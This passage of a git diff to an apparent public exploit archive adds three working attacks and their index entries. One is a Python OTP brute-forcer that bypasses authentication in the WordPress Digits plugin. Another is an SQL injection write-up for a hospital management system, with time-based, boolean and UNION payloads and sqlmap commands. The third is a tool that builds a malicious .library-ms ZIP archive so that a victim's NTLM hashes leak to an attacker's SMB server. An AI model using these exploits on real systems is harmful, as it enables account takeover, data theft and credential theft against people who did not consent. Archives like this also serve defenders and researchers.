Proxy. +2. Send the request to Intruder. +3. Mark the `sms_otp` parameter as the payload position. +4. Load a payload list from `000000` to `999999` (for 6-digit OTPs). +5. Start the attack and monitor responses for a different status code, length, or success message. + +""" + +import requests + +def brute(otp): + url = "https://example.com/wp-admin/admin-ajax.php" + data = { # Replace with targets data + "login_digt_countrycode": "+", + "digits_phone": "000000000", + "action_type": "phone", + "sms_otp": otp, + "otp_step_1": "1", + "instance_id": "xxxxxxx", + "action": "digits_forms_ajax", + "type": "forgot", + "forgot_pass_method": "sms_otp", + "digits": "1", + "digits_redirect_page": "//example.com/", + "digits_form": "xxxxxxxx", + "_wp_http_referer": "/?login=true" + } + headers = { + "User-Agent": "Mozilla/5.0", + "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "X-Requested-With": "XMLHttpRequest", + "Referer": "https://example.com/?login=true" # Replace with intercepted referer + } + response = requests.post(url, data=data, headers=headers) + if '"success":true' in response.text: + print(f"[+] OTP FOUND: {otp}") + exit() + +def main(): + for otp in range(0, 10000): # range(0, 1000000): for 6-digit + otp_str = f"{otp:04d}" # {otp:06d} for 6-digit + print(f"[*] Trying OTP: {otp_str}") + brute(otp_str) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52312.txt b/exploits/multiple/webapps/52312.txt new file mode 100644 index 000000000..c3a761653 --- /dev/null +++ b/exploits/multiple/webapps/52312.txt @@ -0,0 +1,72 @@ +# Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection +# Google Dork: N/A +# Exploit Author: Carine Constantino +# Vendor Homepage: https://www.campcodes.com +# Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Linux - Ubuntu Ubuntu 23.10 +# CVE: CVE-2025-5298 + +# Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection +# The report in admin/betweendates-detailsreports.php does not validate ‘fromdate’ and ‘todate’ fields +# And allows the processing of SQL Injection queries of the types: + +# blind time-based in the ‘fromdate’ field +# boolean-based in the ‘todate’ field +# Union Query in the ‘todate’ field + +‘fromdate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request + +POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 45 +Origin: http://127.0.0.1 +Connection: keep-alive +Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php +Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe +Upgrade-Insecure-Requests: 1 +Priority: u=0, i + +fromdate=&todate=&submit= + +=======================================|| Blind Time Based - ‘fromdate’ field ||============================================== + +SQLMap identified the following injection payload: + +Parameter: fromdate (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM (SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit= + +SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T” + + +=======================================|| Boolean Based - ‘todate’ field ||============================================== + +‘todate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request +SQLMap identified the following injection payload: + +Parameter: todate (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit= + +SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B” + +=======================================|| Union Query - ‘todate’ field ||============================================== + +Another technique on ‘todate’ field can be exploited +SQLMap identified the following injection payload: + +Parameter: todate (POST) + Type: UNION query + Title: Generic UNION query (NULL) - 11 columns + Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit= + + +SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U” \ No newline at end of file diff --git a/exploits/windows/remote/52310.py b/exploits/windows/remote/52310.py new file mode 100755 index 000000000..cde0bf91b --- /dev/null +++ b/exploits/windows/remote/52310.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python3 +# Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure +# Exploit Author: Mohammed Idrees Banyamer +# Twitter/GitHub:https://github.com/mbanyamer +# Date: 2025-05-27 +# CVE: CVE-2025-24071 +# Vendor: Microsoft +# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB) +# Tested on: Windows 11 (23H2) +# Type: Local / Remote (NTLM Leak) +# Platform: Windows +# Vulnerability Type: Information Disclosure +# Description: +# Windows Explorer automatically initiates an SMB authentication request when a +# .library-ms file is extracted from a ZIP archive. This causes NTLM credentials +# (in hashed format) to be leaked to a remote SMB server controlled by the attacker. +# No user interaction is required beyond extraction. + +import zipfile +from pathlib import Path +import argparse +import re +import sys +from colorama import Fore, Style + +def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path: + """Creates a malicious .library-ms file pointing to an attacker's SMB server.""" + payload = f''' + + + + + \\\\{ip}\\shared + + + +''' + + output_file = output_dir / f"{filename}.library-ms" + output_file.write_text(payload, encoding="utf-8") + return output_file + +def build_zip(library_file: Path, output_zip: Path): + """Packages the .library-ms file into a ZIP archive.""" + with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive: + archive.write(library_file, arcname=library_file.name) + print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}") + +def is_valid_ip(ip: str) -> bool: + return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None + +def main(): + parser = argparse.ArgumentParser( + description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive", + epilog="example:\n python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep", + formatter_class=argparse.RawTextHelpFormatter + ) + + parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)") + parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)") + parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)") + parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation") + + args = parser.parse_args() + + if not is_valid_ip(args.ip): + print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}") + sys.exit(1) + + output_dir = Path(args.output) + output_dir.mkdir(parents=True, exist_ok=True) + + print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}") + library_file = create_library_ms(args.ip, args.name, output_dir) + zip_file = output_dir / f"{args.name}.zip" + build_zip(library_file, zip_file) + + if not args.keep: + library_file.unlink() + print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}") + + print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 29175d14f..aea095c41 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10794,6 +10794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,,2019-04-19,2019-04-19,1,CVE-2019-3396,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/confluence_widget_connector.rb 38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,remote,multiple,8080,2015-12-08,2015-12-08,1,CVE-2015-5603;OSVDB-126829,"Metasploit Framework (MSF)",,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html 35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple,,2011-06-28,2015-01-26,1,,,,,,https://www.securityfocus.com/bid/48484/info +52309,exploits/multiple/remote/52309.txt,"Automic Agent 24.3.0 HF4 - Privilege Escalation",2025-05-29,"Flora Schäfer",remote,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4971,,,,, 22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",remote,multiple,,2003-02-28,2012-10-28,1,CVE-2003-1386;OSVDB-4806,,,,,https://www.securityfocus.com/bid/6980/info 43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/9a1d3d165d7b32addf6d0a9ccf86626ee7e76093/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt 40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String",2016-07-19,bashis,remote,multiple,,2016-07-19,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/axis-ssid-PoC.py @@ -10936,6 +10937,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info +52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,, 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info 29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info 47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb @@ -11532,6 +11534,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",remote,multiple,,2006-05-31,2013-08-29,1,CVE-2006-2769;OSVDB-25837,,,,,https://www.securityfocus.com/bid/18200/info 21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",remote,multiple,,2001-07-25,2012-09-03,1,OSVDB-88584;OSVDB-88583,,,,,https://www.securityfocus.com/bid/3097/info 16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,remote,multiple,,2010-06-22,2016-10-27,1,CVE-2003-0722;OSVDB-4585,"Metasploit Framework (MSF)",,,, +52311,exploits/multiple/remote/52311.py,"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-28995,,,,, 36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",remote,multiple,,2012-01-10,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/51337/info 31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info 24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,, @@ -11836,6 +11839,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py 52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,, 18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,, +52312,exploits/multiple/webapps/52312.txt,"Campcodes Online Hospital Management System 1.0 - SQL Injection",2025-05-29,"Carine Constantino",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-5298,,,,, 18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,, 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,, 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,, @@ -12504,6 +12508,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,, 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ 52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011 +52307,exploits/multiple/webapps/52307.txt,"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing",2025-05-29,"Saleh Tarawneh",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4094,,,,, 52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,, 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,, 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,, @@ -45941,6 +45946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,, 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,, 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, +52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,, 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,, 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,